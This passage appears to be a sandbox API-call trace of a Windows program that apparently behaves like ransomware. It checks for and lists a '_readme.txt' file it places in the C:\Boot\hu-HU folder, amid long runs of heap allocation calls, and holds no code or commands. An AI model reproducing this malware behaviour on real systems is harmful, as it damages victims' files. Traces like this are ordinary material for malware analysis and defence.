returned="hu-HU\\" [0146.543] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.543] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.543] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.543] PathFindFileNameW (pszPath="") returned="" [0146.543] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.543] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.543] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.543] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.543] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.543] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.543] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.543] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0146.543] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.543] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.543] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0146.544] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.544] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.544] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.545] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.545] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.545] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.545] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb6bcb0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.545] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb6bcb0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.545] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.545] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.545] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.545] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.545] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.545] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.545] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.545] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.545] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.545] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.545] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.545] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.545] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.545] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.545] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.545] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.545] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.545] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.545] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.545] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.545] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.545] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.545] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.545] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.545] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.545] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.545] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.546] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.547] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.547] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.548] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.548] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.549] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.549] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | 